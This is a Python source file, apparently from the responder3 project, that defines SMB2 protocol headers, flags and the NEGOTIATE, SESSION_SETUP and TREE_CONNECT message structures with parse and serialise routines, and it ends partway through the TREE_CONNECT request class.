import io
import os
import sys
import enum
import uuid
import traceback

from responder3.protocols.SMB.ntstatus import *
from responder3.protocols.SMB.utils import *


class SMB2HeaderFlag(enum.IntFlag):
	SMB2_FLAGS_SERVER_TO_REDIR    = 0x00000001  # When set, indicates the message is a response rather than a request. This MUST be set on responses sent from the server to the client, and MUST NOT be set on requests sent from the client to the server.
	SMB2_FLAGS_ASYNC_COMMAND      = 0x00000002  # When set, indicates that this is an ASYNC SMB2 header. Always set for headers of the form described in this section.
	SMB2_FLAGS_RELATED_OPERATIONS = 0x00000004
	SMB2_FLAGS_SIGNED             = 0x00000008  # When set, indicates that this packet has been signed. The use of this flag is as specified in section 3.1.5.1.
	SMB2_FLAGS_PRIORITY_MASK      = 0x00000070  # This flag is only valid for the SMB 3.1.1 dialect. It is a mask for the requested I/O priority of the request, and it MUST be a value in the range 0 to 7.
	SMB2_FLAGS_DFS_OPERATIONS     = 0x10000000  # When set, indicates that this command is a Distributed File System (DFS) operation. The use of this flag is as specified in section 3.3.5.9.
	SMB2_FLAGS_REPLAY_OPERATION   = 0x20000000


# https://msdn.microsoft.com/en-us/library/cc246528.aspx
class SMB2Command(enum.Enum):
	NEGOTIATE       = 0x0000
	SESSION_SETUP   = 0x0001
	LOGOFF          = 0x0002
	TREE_CONNECT    = 0x0003
	TREE_DISCONNECT = 0x0004
	CREATE          = 0x0005
	CLOSE           = 0x0006
	FLUSH           = 0x0007
	READ            = 0x0008
	WRITE           = 0x0009
	LOCK            = 0x000A
	IOCTL           = 0x000B
	CANCEL          = 0x000C
	ECHO            = 0x000D
	QUERY_DIRECTORY = 0x000E
	CHANGE_NOTIFY   = 0x000F
	QUERY_INFO      = 0x0010
	SET_INFO        = 0x0011
	OPLOCK_BREAK    = 0x0012


# https://msdn.microsoft.com/en-us/library/cc246528.aspx
class SMB2Header_ASYNC:
	def __init__(self):
		self.ProtocolId    = None
		self.StructureSize = None
		self.CreditCharge  = None
		self.Status        = None  # In a request, this field is interpreted in different ways depending on the SMB2 dialect.
		self.Command       = None
		self.Credit        = None
		self.Flags         = None
		self.NextCommand   = None
		self.MessageId     = None
		self.AsyncId       = None
		self.SessionId     = None
		self.Signature     = None

	@staticmethod
	def from_buffer(buff):
		hdr = SMB2Header_ASYNC()
		hdr.ProtocolId = buff.read(4)
		assert hdr.ProtocolId == b'\xFESMB'
		hdr.StructureSize = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		assert hdr.StructureSize == 64
		hdr.CreditCharge = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		hdr.Status = NTStatus(int.from_bytes(buff.read(4), byteorder='little', signed = False))
		hdr.Command = SMB2Command(int.from_bytes(buff.read(2), byteorder='little', signed = False))
		hdr.Credit =  int.from_bytes(buff.read(2), byteorder='little', signed = False)
		hdr.Flags =  SMB2HeaderFlag(int.from_bytes(buff.read(4), byteorder='little', signed = False))
		hdr.NextCommand = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		hdr.MessageId = int.from_bytes(buff.read(8), byteorder='little', signed = False)
		hdr.AsyncId = buff.read(8)
		hdr.SessionId = buff.read(8)
		hdr.Signature = buff.read(16)
		return hdr

	@staticmethod
	def construct(cmd, flags, msgid, Credit = 0, NextCommand=0, CreditCharge = 0, 
					Signature=b'\x00'*16,
					AsyncId=b'\x00'*8, SessionId = b'\x00'*8, 
					status = NTStatus.STATUS_SUCCESS):
		hdr = SMB2Header_ASYNC()
		hdr.ProtocolId = b'\xFESMB'
		hdr.StructureSize = 64
		hdr.CreditCharge = CreditCharge
		hdr.Status = status
		hdr.Command = cmd
		hdr.Credit =  Credit
		hdr.Flags =  flags
		hdr.NextCommand = NextCommand
		hdr.MessageId = msgid
		hdr.AsyncId = AsyncId
		hdr.SessionId = SessionId
		hdr.Signature = Signature

		return hdr

	def to_bytes(self):
		t  = self.ProtocolId
		t += self.StructureSize.to_bytes(2, byteorder = 'little', signed=False)
		t += self.CreditCharge.to_bytes(2, byteorder = 'little', signed=False)
		t += self.Status.value.to_bytes(4, byteorder = 'little', signed=False)
		t += self.Command.value.to_bytes(2, byteorder = 'little', signed=False)
		t += self.Credit.to_bytes(2, byteorder = 'little', signed=False)
		t += self.Flags.to_bytes(4, byteorder = 'little', signed=False)
		t += self.NextCommand.to_bytes(4, byteorder = 'little', signed=False)
		t += self.MessageId.to_bytes(8, byteorder = 'little', signed=False)
		t += self.AsyncId
		t += self.SessionId
		t += self.Signature
		return t

	def __repr__(self):
		t = '===SMB2 HEADER ASYNC===\r\n'
		t += 'ProtocolId: %s\r\n' % self.ProtocolId
		t += 'StructureSize: %s\r\n' % self.StructureSize
		t += 'CreditCharge: %s\r\n' % self.CreditCharge
		t += 'Status: %s\r\n' % self.Status.name
		t += 'Command: %s\r\n' % self.Command.name
		t += 'Credit: %s\r\n' % self.Credit
		t += 'Flags: %s\r\n' % self.Flags
		t += 'NextCommand: %s\r\n' % self.NextCommand
		t += 'MessageId: %s\r\n' % self.MessageId
		t += 'AsyncId: %s\r\n' % self.AsyncId
		t += 'SessionId: %s\r\n' % self.SessionId
		t += 'Signature: %s\r\n' % self.Signature
		return t


class SMB2Header_SYNC():
	def __init__(self):
		self.ProtocolId    = None
		self.StructureSize = None
		self.CreditCharge  = None
		self.Status        = None
		self.Command       = None
		self.Credit        = None
		self.Flags         = None
		self.NextCommand   = None
		self.MessageId     = None
		self.Reserved      = None
		self.TreeId        = None
		self.SessionId     = None
		self.Signature     = None

	@staticmethod
	def from_buffer(buff):
		hdr = SMB2Header_SYNC()
		hdr.ProtocolId = buff.read(4)
		assert hdr.ProtocolId == b'\xFESMB'
		hdr.StructureSize = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		assert hdr.StructureSize == 64
		hdr.CreditCharge = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		hdr.Status      = NTStatus(int.from_bytes(buff.read(4), byteorder='little', signed = False))
		hdr.Command     = SMB2Command(int.from_bytes(buff.read(2), byteorder='little', signed = False))
		hdr.Credit      = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		hdr.Flags       = SMB2HeaderFlag(int.from_bytes(buff.read(4), byteorder='little', signed = False))
		hdr.NextCommand = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		hdr.MessageId   = int.from_bytes(buff.read(8), byteorder='little', signed = False)
		hdr.Reserved    = buff.read(4)
		hdr.TreeId      = buff.read(4)
		hdr.SessionId   = buff.read(8)
		hdr.Signature   = buff.read(16)
		return hdr

	def to_bytes(self):
		t  = self.ProtocolId
		t += self.StructureSize.to_bytes(2, byteorder = 'little', signed=False)
		t += self.CreditCharge.to_bytes(2, byteorder = 'little', signed=False)
		t += self.Status.to_bytes(4, byteorder = 'little', signed=False)
		t += self.Command.to_bytes(2, byteorder = 'little', signed=False)
		t += self.Credit.to_bytes(2, byteorder = 'little', signed=False)
		t += self.Flags.to_bytes(4, byteorder = 'little', signed=False)
		t += self.NextCommand.to_bytes(4, byteorder = 'little', signed=False)
		t += self.MessageId.to_bytes(8, byteorder = 'little', signed=False)
		t += self.Reserved
		t += self.TreeId
		t += self.SessionId
		t += self.Signature
		return t

	def __repr__(self):
		t = '===SMB2 HEADER SYNC===\r\n'
		t += 'ProtocolId:    %s\r\n' % self.ProtocolId
		t += 'StructureSize: %s\r\n' % self.StructureSize
		t += 'CreditCharge:  %s\r\n' % self.CreditCharge
		t += 'Status:    %s\r\n' % self.Status.name
		t += 'Command:   %s\r\n' % self.Command.name
		t += 'Credit:    %s\r\n' % self.Credit
		t += 'Flags:     %s\r\n' % self.Flags
		t += 'NextCommand: %s\r\n' % self.NextCommand
		t += 'MessageId: %s\r\n' % self.MessageId
		t += 'Reserved:  %s\r\n' % self.Reserved
		t += 'TreeId:    %s\r\n' % self.TreeId
		t += 'SessionId: %s\r\n' % self.SessionId
		t += 'Signature: %s\r\n' % self.Signature
		return t


class SMB2NotImplementedCommand:
	def __init__(self):
		self.data = None

	@staticmethod
	def from_buffer(buff):
		cmd = SMB2NotImplementedCommand()
		cmd.data = buff.read()
		return cmd

	def __repr__(self):
		t = '=== SMB2NotImplementedCommand ===\r\n'
		t += 'Data: %s\r\n' % repr(self.data)
		return t


class SMB2Message:
	def __init__(self):
		self.type      = 2
		self.header    = None
		self.command   = None

	@staticmethod
	def from_bytes(bbuff):
		return SMB2Message.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = SMB2Message()
		if SMB2Message.isAsync(buff):
			msg.header = SMB2Header_ASYNC.from_buffer(buff)
		else:
			msg.header = SMB2Header_SYNC.from_buffer(buff)

		classname = msg.header.Command.name
		try:
			if SMB2HeaderFlag.SMB2_FLAGS_SERVER_TO_REDIR in msg.header.Flags:
				classname += '_REPLY'
			else:
				classname += '_REQ'
			print(classname)
			class_ = getattr(sys.modules[__name__], classname)
			msg.command = class_.from_buffer(buff)
		except Exception as e:
			traceback.print_exc()
			print('Could not find command implementation! %s' % str(e))
			msg.command = SMB2NotImplementedCommand.from_buffer(buff)

		return msg

	@staticmethod
	def isAsync(buff):
		"""
		jumping to the header flags and check if the AYSNC command flag is set
		"""
		pos = buff.tell()
		buff.seek(16, io.SEEK_SET)
		flags = SMB2HeaderFlag(int.from_bytes(buff.read(4), byteorder='little', signed = False))
		buff.seek(pos, io.SEEK_SET)
		return SMB2HeaderFlag.SMB2_FLAGS_ASYNC_COMMAND in flags

	def to_bytes(self):
		t  = self.header.to_bytes()
		t += self.command.to_bytes()
		return t

	def __repr__(self):
		t = "== SMBv2 Message =="
		t += repr(self.header)
		t += repr(self.command)
		return t


# https://msdn.microsoft.com/en-us/library/cc246543.aspx
class NegotiateSecurityMode(enum.IntFlag):
	SMB2_NEGOTIATE_SIGNING_ENABLED  = 0x0001
	SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002


# https://msdn.microsoft.com/en-us/library/cc246543.aspx
class NegotiateCapabilities(enum.IntFlag):
	SMB2_GLOBAL_CAP_DFS = 0x00000001 #When set, indicates that the client supports the Distributed File System (DFS).
	SMB2_GLOBAL_CAP_LEASING = 0x00000002 #When set, indicates that the client supports leasing.
	SMB2_GLOBAL_CAP_LARGE_MTU = 0x00000004 #When set, indicates that the client supports multi-credit operations.
	SMB2_GLOBAL_CAP_MULTI_CHANNEL = 0x00000008 #When set, indicates that the client supports establishing multiple channels for a single session.
	SMB2_GLOBAL_CAP_PERSISTENT_HANDLES = 0x00000010 #When set, indicates that the client supports persistent handles.
	SMB2_GLOBAL_CAP_DIRECTORY_LEASING = 0x00000020 #When set, indicates that the client supports directory leasing.
	SMB2_GLOBAL_CAP_ENCRYPTION = 0x00000040 #When set, indicates that the client supports encryption.


class NegotiateDialects(enum.Enum):
	SMB202 = 0x0202 #SMB 2.0.2 dialect revision number.
	SMB210 = 0x0210 #SMB 2.1 dialect revision number.<10>
	SMB300 = 0x0300 #SMB 3.0 dialect revision number. <11>
	SMB302 = 0x0302 #SMB 3.0.2 dialect revision number.<12>
	SMB311 = 0x0311 #SMB 3.1.1 dialect revision number.<13>


# https://msdn.microsoft.com/en-us/library/cc246543.aspx
class NEGOTIATE_REQ:
	def __init__(self):
		self.StructureSize   = None
		self.DialectCount    = None
		self.SecurityMode    = None
		self.Reserved        = None
		self.Capabilities    = None
		self.ClientGuid      = None			
		self.ClientStartTime = None
		self.NegotiateContextOffset = None
		self.NegotiateContextCount = None
		self.Reserved2 = None

		self.NegotiateContextList = None
		self.Dialects        = None	

	@staticmethod
	def from_buffer(buff):
		cmd = NEGOTIATE_REQ()
		cmd.StructureSize = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		assert cmd.StructureSize == 36
		cmd.DialectCount = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		assert cmd.DialectCount > 0
		cmd.SecurityMode = NegotiateSecurityMode(int.from_bytes(buff.read(2), byteorder='little', signed = False))
		cmd.Reserved = buff.read(2)
		cmd.Capabilities = NegotiateCapabilities(int.from_bytes(buff.read(4), byteorder='little', signed = False))
		cmd.ClientGuid = uuid.UUID(bytes=buff.read(16))
		# skipping the next field because it's interpretation depends on the data after it...
		pos = buff.tell()
		buff.seek(8, io.SEEK_CUR)
		
		cmd.Dialects = []		
		for i in range(0, cmd.DialectCount):
			cmd.Dialects.append(NegotiateDialects(int.from_bytes(buff.read(2), byteorder = 'little', signed = False)))

		pos_buff_end = buff.tell()
		buff.seek(pos, io.SEEK_SET)

		if NegotiateDialects.SMB311 in cmd.Dialects:
			cmd.NegotiateContextOffset = int.from_bytes(buff.read(4),byteorder = 'little', signed = False)
			cmd.NegotiateContextCount  = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
			cmd.Reserved2 = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
			cmd.NegotiateContextList = []
			buff.seek(cmd.NegotiateContextOffset, io.SEEK_SET)

			for i in range(0, cmd.NegotiateContextCount):
				cmd.NegotiateContextList.append(SMB2NegotiateContext.from_buffer(buff))
				pad_pos = buff.tell()
				#aligning buffer, because the next data must be on 8-byte aligned position
				q,m = divmod(pad_pos, 8)
				if m != 0:
					buff.seek((q+1)*8, io.SEEK_SET)
		else:
			cmd.ClientStartTime = wintime2datetime(int.from_bytes(buff.read(8), byteorder = 'little', signed = False))
			buff.seek(pos_buff_end, io.SEEK_SET)

		return cmd

	def __repr__(self):
		t = '==== SMB2 NEGOTIATE REQ ====\r\n'
		t += 'StructureSize: %s\r\n' % self.StructureSize
		t += 'DialectCount:  %s\r\n' % self.DialectCount
		t += 'SecurityMode:  %s\r\n' % self.SecurityMode.name
		t += 'Reserved:      %s\r\n' % self.Reserved
		t += 'Capabilities:  %s\r\n' % repr(self.Capabilities)
		t += 'ClientGuid:    %s\r\n' % self.ClientGuid
		if NegotiateDialects.SMB311 in self.Dialects:
			t += 'NegotiateContextOffset:    %s\r\n' % self.NegotiateContextOffset
			t += 'NegotiateContextCount:    %s\r\n' % self.NegotiateContextCount
			t += 'Reserved2:    %s\r\n' % self.Reserved2
			for ctx in self.NegotiateContextList:
				t += repr(ctx)
		else:
			t += 'ClientStartTime:    %s\r\n' % self.ClientStartTime
		
		for dialect in self.Dialects:
			t += '\t Dialect: %s\r\n' % dialect.name

		return t


class SMB2ContextType(enum.Enum):
	SMB2_PREAUTH_INTEGRITY_CAPABILITIES = 0x0001
	SMB2_ENCRYPTION_CAPABILITIES = 0x0002


class SMB2HashAlgorithm(enum.Enum):
	SHA_512 = 0x0001


# https://msdn.microsoft.com/en-us/library/mt208834.aspx
class SMB2NegotiateContext:
	def __init__(self):
		self.ContextType = None
		self.DataLength  = None
		self.Reserved    = None
		self.Data        = None

	@staticmethod
	def from_buffer(buff):
		ctx = SMB2NegotiateContext()
		ctx.ContextType = SMB2ContextType(int.from_bytes(buff.read(2), byteorder = 'little', signed = False))
		ctx.DataLength  = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
		ctx.Reserved    = buff.read(4)

		if ctx.ContextType == SMB2ContextType.SMB2_PREAUTH_INTEGRITY_CAPABILITIES:
			ctx.Data = SMB2PreauthIntegrityCapabilities.from_buffer(buff)

		elif ctx.ContextType == SMB2ContextType.SMB2_ENCRYPTION_CAPABILITIES:
			ctx.Data = SMB2EncryptionCapabilities.from_buffer(buff)

		return ctx

	def to_bytes(self):
		t  = self.ContextType.to_bytes(2, byteorder = 'little', signed=False)
		t += self.DataLength.to_bytes(2, byteorder = 'little', signed=False)
		t += self.Reserved.to_bytes(4, byteorder = 'little', signed=False)

		return t

	def __repr__(self):
		t = '==== SMB2 Negotiate Context ====\r\n'
		t += 'ConextType: %s\r\n' % self.ContextType.name
		t += 'DataLength: %s\r\n' % self.DataLength
		t += 'Data: %s\r\n' % repr(self.Data)

		return t


class SMB2PreauthIntegrityCapabilities:
	def __init__(self, data=None):
		self.HashAlgorithmCount = None
		self.SaltLength         = None
		self.HashAlgorithms     = None
		self.Salt               = None

	@staticmethod
	def from_buffer(buff):
		cap = SMB2PreauthIntegrityCapabilities()
		cap.HashAlgorithmCount = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		cap.SaltLength = int.from_bytes(buff.read(2), byteorder = 'little', signed = False)
		cap.HashAlgorithms = []
		for i in range(cap.HashAlgorithmCount):
			cap.HashAlgorithms.append(SMB2HashAlgorithm(int.from_bytes(buff.read(2), byteorder ='little', signed = False)))

		cap.Salt = buff.read(cap.SaltLength)

		return cap

	def to_bytes(self):
		t  = self.HashAlgorithmCount.to_bytes(2, byteorder = 'little', signed=False)
		t += self.SaltLength.to_bytes(2, byteorder = 'little', signed=False)
		for hashalgo in self.HashAlgorithms:
			t += hashalgo.to_bytes(2, byteorder = 'little', signed=False)
		
		t += self.Salt

		return t

	def __repr__(self):
		t = '==== SMB2 Preauth Integrity Capabilities ====\r\n'
		t += 'HashAlgorithmCount: %s\r\n' % self.HashAlgorithmCount
		t += 'SaltLength: %s\r\n' % self.SaltLength
		t += 'Salt: %s\r\n' % self.Salt
		
		for algo in self.HashAlgorithms:
			t += 'HashAlgo: %s\r\n' % algo.name

		return t


class SMB2Cipher(enum.Enum):
	AES_128_CCM = 0x0001
	AES_128_GCM = 0x0002


class SMB2EncryptionCapabilities:
	def __init__(self):
		self.CipherCount = None
		self.Ciphers = None

	@staticmethod
	def from_buffer(buff):
		cap = SMB2EncryptionCapabilities()
		cap.CipherCount = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		cap.Ciphers = []

		for i in range(cap.CipherCount):
			cap.Ciphers.append(SMB2Cipher(int.from_bytes(buff.read(2), byteorder='little', signed = False)))

		return cap

	def to_bytes(self):
		t  = self.CipherCount.to_bytes(2, byteorder = 'little', signed=False)
		for cipher in self.Ciphers:
			t += cipher.to_bytes(2, byteorder = 'little', signed=False)

		return t
			

	def __repr__(self):
		t = '==== SMB2 Encryption Capabilities ====\r\n'
		t += 'CipherCount: %s\r\n' % self.CipherCount
		for cipher in self.Ciphers:
			t += 'Cipher: %s\r\n' % cipher.name

		return t


# https://msdn.microsoft.com/en-us/library/cc246561.aspx
class NEGOTIATE_REPLY:
	def __init__(self):
		self.StructureSize = None
		self.SecurityMode = None
		self.DialectRevision = None
		self.NegotiateContextCount = None # or reserved
		self.ServerGuid = None
		self.Capabilities = None
		self.MaxTransactSize = None
		self.MaxReadSize = None
		self.MaxWriteSize = None
		self.SystemTime = None
		self.ServerStartTime = None
		self.SecurityBufferOffset = None
		self.SecurityBufferLength = None
		self.NegotiateContextOffset = None
		self.Buffer = None
		self.Padding = None
		self.NegotiateContextList = None
		self.ppos = 64

	@staticmethod
	def from_bytes(bbuff):
		return NEGOTIATE_REPLY.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = NEGOTIATE_REPLY()
		msg.StructureSize   = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		assert msg.StructureSize == 65
		msg.SecurityMode    = NegotiateSecurityMode(int.from_bytes(buff.read(2), byteorder='little', signed = False))
		msg.DialectRevision = NegotiateDialects(int.from_bytes(buff.read(2), byteorder='little', signed = False))
		msg.NegotiateContextCount  = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		msg.ServerGuid      = uuid.UUID(bytes_le=buff.read(16))
		msg.Capabilities    = NegotiateCapabilities(int.from_bytes(buff.read(4), byteorder='little', signed = False))
		msg.MaxTransactSize = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		msg.MaxReadSize     = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		msg.MaxWriteSize    = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		msg.SystemTime      = wintime2datetime(int.from_bytes(buff.read(8), byteorder='little', signed = False))
		msg.ServerStartTime = wintime2datetime(int.from_bytes(buff.read(8), byteorder='little', signed = False))
		msg.SecurityBufferOffset = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		msg.SecurityBufferLength = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		msg.NegotiateContextOffset = int.from_bytes(buff.read(4), byteorder='little', signed = False)

		pos = buff.tell()
		if msg.SecurityBufferLength != 0:
			buff.seek(msg.SecurityBufferOffset, io.SEEK_SET)
			msg.Buffer = buff.read(msg.SecurityBufferLength)

		pos_buff_end = buff.tell()

		if msg.DialectRevision == NegotiateDialects.SMB311:
			msg.NegotiateContextList = []
			buff.seek(msg.NegotiateContextOffset, io.SEEK_SET)
			for i in range(msg.NegotiateContextCount):
				msg.NegotiateContextList.append(SMB2NegotiateContext.from_buffer(buff))

		return msg

	@staticmethod
	def construct(data, SecurityMode, DialectRevision, ServerGuid, Capabilities, 
					MaxTransactSize= 8388608, MaxReadSize= 8388608, MaxWriteSize= 8388608, 
					SystemTime = datetime.datetime.now(), 
					ServerStartTime=datetime.datetime.now() - datetime.timedelta(days=1),
					NegotiateContextList = [], ppos = None):
		
		cmd = NEGOTIATE_REPLY()
		if ppos is None:
			ppos = cmd.ppos
		#ppos = the size of the message until this class. it is needed to calculate the offsets!
		cmd.StructureSize = 65
		cmd.SecurityMode = SecurityMode
		cmd.DialectRevision = DialectRevision
		cmd.NegotiateContextCount = len(NegotiateContextList) #or reserved
		cmd.ServerGuid = ServerGuid
		cmd.Capabilities = Capabilities
		cmd.MaxTransactSize = MaxTransactSize
		cmd.MaxReadSize = MaxReadSize
		cmd.MaxWriteSize = MaxWriteSize
		cmd.SystemTime = SystemTime
		cmd.ServerStartTime = ServerStartTime
		cmd.SecurityBufferOffset = ppos + 64
		cmd.SecurityBufferLength = len(data)
		if NegotiateContextList == []:
			cmd.NegotiateContextOffset = 0
		else:
			cmd.NegotiateContextOffset = cmd.SecurityBufferOffset + cmd.SecurityBufferLength ##WARNING! THIS SHOULD BE PADDED!!!!!
		cmd.Buffer = data
		cmd.NegotiateContextList = NegotiateContextList

		return cmd

	def to_bytes(self, ppos = None):
		if ppos is None:
			ppos = self.ppos
		t  = self.StructureSize.to_bytes(2, byteorder = 'little', signed=False)
		t += self.SecurityMode.to_bytes(2, byteorder = 'little', signed=False)
		t += self.DialectRevision.value.to_bytes(2, byteorder = 'little', signed=False)
		t += self.NegotiateContextCount.to_bytes(2, byteorder = 'little', signed=False)
		t += self.ServerGuid.bytes_le
		t += self.Capabilities.to_bytes(4, byteorder = 'little', signed=False)
		t += self.MaxTransactSize.to_bytes(4, byteorder = 'little', signed=False)
		t += self.MaxReadSize.to_bytes(4, byteorder = 'little', signed=False)
		t += self.MaxWriteSize.to_bytes(4, byteorder = 'little', signed=False)
		t += dt2wt(self.SystemTime).to_bytes(8, byteorder = 'little', signed=False)
		t += dt2wt(self.ServerStartTime).to_bytes(8, byteorder = 'little', signed=False)

		t += self.SecurityBufferOffset.to_bytes(2, byteorder = 'little', signed=False)
		t += self.SecurityBufferLength.to_bytes(2, byteorder = 'little', signed=False)
		print(self.NegotiateContextOffset)
		t += self.NegotiateContextOffset.to_bytes(4, byteorder = 'little', signed=False)
		t += self.Buffer

		if self.NegotiateContextCount > 0:
			for ngctx in self.NegotiateContextList:
				t+= ngctx.to_bytes()
				#PADDING!
				q,m = divmod(len(t)+ppos,8)
				t+= b'\x00'*( (q+1)*8 -  len(t)   )

		return t

	def __repr__(self):
		t = '==== SMB2 NEGOTIATE REPLY ====\r\n'
		t += 'StructureSize: %s\r\n' % self.StructureSize
		t += 'SecurityMode: %s\r\n' % repr(self.SecurityMode)
		t += 'DialectRevision: %s\r\n' % self.DialectRevision.name
		t += 'ServerGuid: %s\r\n' % self.ServerGuid
		t += 'Capabilities: %s\r\n' % repr(self.Capabilities)
		t += 'MaxTransactSize: %s\r\n' % self.MaxTransactSize
		t += 'MaxReadSize: %s\r\n' % self.MaxReadSize
		t += 'MaxWriteSize: %s\r\n' % self.MaxWriteSize
		t += 'SystemTime: %s\r\n' % self.SystemTime.isoformat()
		t += 'ServerStartTime: %s\r\n' % self.ServerStartTime.isoformat()
		t += 'SecurityBufferOffset: %s\r\n' % self.SecurityBufferOffset
		t += 'SecurityBufferLength: %s\r\n' % self.SecurityBufferLength
		t += 'Buffer: %s\r\n' % self.Buffer
		t += 'NegotiateContextList: %s\r\n' % self.NegotiateContextList
		return t


class SessionSetupFlag(enum.IntFlag):
	SMB2_SESSION_FLAG_BINDING = 0x01


class SessionSetupCapabilities(enum.IntFlag):
	SMB2_GLOBAL_CAP_DFS     = 0x00000001 #When set, indicates that the client supports the Distributed File System (DFS).
	SMB2_GLOBAL_CAP_UNUSED1 = 0x00000002 #SHOULD be set to zero, and server MUST ignore.
	SMB2_GLOBAL_CAP_UNUSED2 = 0x00000004 #SHOULD be set to zero and server MUST ignore.
	SMB2_GLOBAL_CAP_UNUSED3 = 0x00000008 #


# https://msdn.microsoft.com/en-us/library/cc246563.aspx
class SESSION_SETUP_REQ:
	def __init__(self):
		self.StructureSize = None
		self.Flags = None
		self.SecurityMode = None
		self.Capabilities = None
		self.Channel = None
		self.SecurityBufferOffset = None
		self.SecurityBufferLength = None
		self.PreviousSessionId = None
		self.Buffer = None

	@staticmethod
	def from_bytes(bbuff):
		return SESSION_SETUP_REQ.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = SESSION_SETUP_REQ()
		msg.StructureSize   = int.from_bytes(buff.read(2), byteorder='little')
		assert msg.StructureSize == 25
		msg.Flags = SessionSetupFlag(int.from_bytes(buff.read(1), byteorder='little'))
		msg.SecurityMode = NegotiateSecurityMode(int.from_bytes(buff.read(1), byteorder='little'))
		msg.Capabilities = SessionSetupCapabilities(int.from_bytes(buff.read(4), byteorder = 'little'))
		msg.Channel      = int.from_bytes(buff.read(4), byteorder = 'little')
		msg.SecurityBufferOffset = int.from_bytes(buff.read(2), byteorder = 'little')
		msg.SecurityBufferLength = int.from_bytes(buff.read(2), byteorder = 'little')
		msg.PreviousSessionId    = buff.read(2)

		buff.seek(msg.SecurityBufferOffset, io.SEEK_SET)
		msg.Buffer= buff.read(msg.SecurityBufferLength)
		return msg

	def __repr__(self):
		t = '==== SMB2 SESSION SETUP REQ ====\r\n'
		t += 'StructureSize: %s\r\n' % self.StructureSize
		t += 'Flags: %s\r\n' % repr(self.Flags)
		t += 'SecurityMode: %s\r\n' % self.SecurityMode
		t += 'Capabilities: %s\r\n' % self.Capabilities
		t += 'Channel: %s\r\n' % self.Channel
		t += 'SecurityBufferOffset: %s\r\n' % self.SecurityBufferOffset
		t += 'SecurityBufferLength: %s\r\n' % self.SecurityBufferLength
		t += 'PreviousSessionId: %s\r\n' % self.PreviousSessionId
		t += 'Buffer: %s\r\n' % self.Buffer
		return t


# https://msdn.microsoft.com/en-us/library/cc246564.aspx
class SessionFlags(enum.IntFlag):
	SMB2_SESSION_FLAG_IS_GUEST = 0x0001 #If set, the client has been authenticated as a guest user.
	SMB2_SESSION_FLAG_IS_NULL = 0x0002 #If set, the client has been authenticated as an anonymous user.
	SMB2_SESSION_FLAG_ENCRYPT_DATA = 0x0004 #If set, the server requires encryption of messages on this session, per the conditions specified in section 3.3.5.2.9. This flag is only valid for the SMB 3.x dialect family.


# https://msdn.microsoft.com/en-us/library/cc246564.aspx
class SESSION_SETUP_REPLY():
	def __init__(self):
		self.StructureSize = None
		self.SessionFlags = None
		self.SecurityBufferOffset = None
		self.SecurityBufferLength = None
		self.Buffer = None
		self.ppos = 64

	@staticmethod
	def from_bytes(bbuff):
		return SESSION_SETUP_REPLY.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = SESSION_SETUP_REPLY()
		msg.StructureSize   = int.from_bytes(buff.read(2), byteorder='little')
		assert msg.StructureSize == 9
		msg.SessionFlags = SessionFlags(int.from_bytes(buff.read(2), byteorder = 'little'))
		msg.SecurityBufferOffset = int.from_bytes(buff.read(2), byteorder = 'little')
		msg.SecurityBufferLength = int.from_bytes(buff.read(2), byteorder = 'little')
		msg.Buffer= buff.read(msg.SecurityBufferLength)

	@staticmethod
	def construct(data, flags, ppos = None):
		msg = SESSION_SETUP_REPLY()
		if ppos is None:
			ppos = msg.ppos
		msg.StructureSize = 9
		msg.SessionFlags = flags
		msg.SecurityBufferOffset = ppos + 8
		msg.SecurityBufferLength = len(data)
		msg.Buffer = data
		return msg

	def to_bytes(self):
		t  = self.StructureSize.to_bytes(2, byteorder = 'little', signed=False)
		t += self.SessionFlags.to_bytes(2, byteorder = 'little', signed=False)
		t += self.SecurityBufferOffset.to_bytes(2, byteorder = 'little', signed=False)
		t += self.SecurityBufferLength.to_bytes(2, byteorder = 'little', signed=False)
		t += self.Buffer
		return t

	def __repr__(self):
		t = '==== SMB2 SESSION SETUP REPLY ====\r\n'
		t += 'StructureSize: %s\r\n' % self.StructureSize
		t += 'SessionFlags: %s\r\n' % repr(self.SessionFlags)
		t += 'SecurityBufferOffset: %s\r\n' % self.SecurityBufferOffset
		t += 'SecurityBufferLength: %s\r\n' % self.SecurityBufferLength
		t += 'Buffer: %s\r\n' % self.Buffer
		return t


class SMB2TreeConnectRQFlag(enum.IntFlag):
	SMB2_TREE_CONNECT_FLAG_CLUSTER_RECONNECT = 0x0001  # When set, indicates that the client has previously connected to the specified cluster share using the SMB dialect of the connection on which the request is received.
	SMB2_TREE_CONNECT_FLAG_REDIRECT_TO_OWNER = 0x0002  # When set, indicates that the client can handle synchronous share redirects via a Share Redirect error context response as specified in section 2.2.2.2.2.
	SMB2_TREE_CONNECT_FLAG_EXTENSION_PRESENT = 0x0004  # When set, indicates that a tree connect request extension, as specified in section 2.2.9.1, is present, starting at the Buffer field of this tree connect request.


# https://msdn.microsoft.com/en-us/library/cc246567.aspx
class TREE_CONNECT_REQ:
	def __init__(self, data = None):
		#TODO: FIX THIS!!!!
		self.Dialect = NegotiateDialects.SMB300
		#######################################
		self.StructureSize = None
		self.Flags = None #only in SMB311
		self.PathOffset = None
		self.PathLength = None
		
		self.PathName = None
		self.Reserved = None
